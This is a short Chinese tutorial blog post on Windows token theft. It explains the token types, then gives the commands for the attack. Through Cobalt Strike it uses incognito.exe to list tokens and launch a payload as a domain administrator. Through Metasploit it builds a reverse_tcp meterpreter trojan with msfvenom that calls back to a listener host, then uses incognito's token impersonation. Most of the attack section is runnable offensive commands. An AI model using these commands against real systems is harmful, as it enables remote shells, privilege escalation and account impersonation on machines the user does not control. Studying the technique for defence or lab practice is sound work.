Windows令牌窃取攻击
目录一、Windows令牌
令牌(Token)是系统的临时密钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的,它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌持续存在系统中,除非系统重新启动。
Windows令牌种类:
(1)访问令牌(Access Token)表示访问控制操作主题的系统对象
(2)会话令牌(Session Token)是交互会话中唯一的身份标识符
(3)保密令牌(Security Token)又叫认证令牌或硬件令牌,是一种计算机身份校验的物理设备
Windows访问令牌又分为:
(1)授权令牌(Delegation Token),也叫主令牌,支持交互式会话登录(例如本地用户登录、远程桌面登录)
(2)模拟令牌(Impresonation Token)支持非交互的会话(例如使用 net use访问共享文件夹)
二、令牌窃取攻击
前提:拿到的用户是过了UAC的管理员
1、通过CS进行令牌攻击
(1)通过CS控制了一个过了UAC的管理员
(2)列出用户的令牌
shell incognito.exe list_tokens -u
(3)使用窃取的令牌进行上线
shell incognito.exe execute -c "XB\Administrator" C:\Users\test\Desktop\win10-3\can.exe
2、通过msf进行令牌攻击
(1)通过msfvenom生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.133 lport=4567 -f exe -o payload.exe
(2)进入msfconsole进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.142.133
set lport 4567
run
(3)加载incognito,进行令牌攻击
load incognito #加载incognito
list_tokens -u #列举令牌
impersonate_token "XB\Administrator" #令牌攻击
rev2self 或 drop_token #返回之前token
标签:令牌,Windows,攻击,Token,窃取,incognito
From: https://www.cnblogs.com/candada/p/17689944.html